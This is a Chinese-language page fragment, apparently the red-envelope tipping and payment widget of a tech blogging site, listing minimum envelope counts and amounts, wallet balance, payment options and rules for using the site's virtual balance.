添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值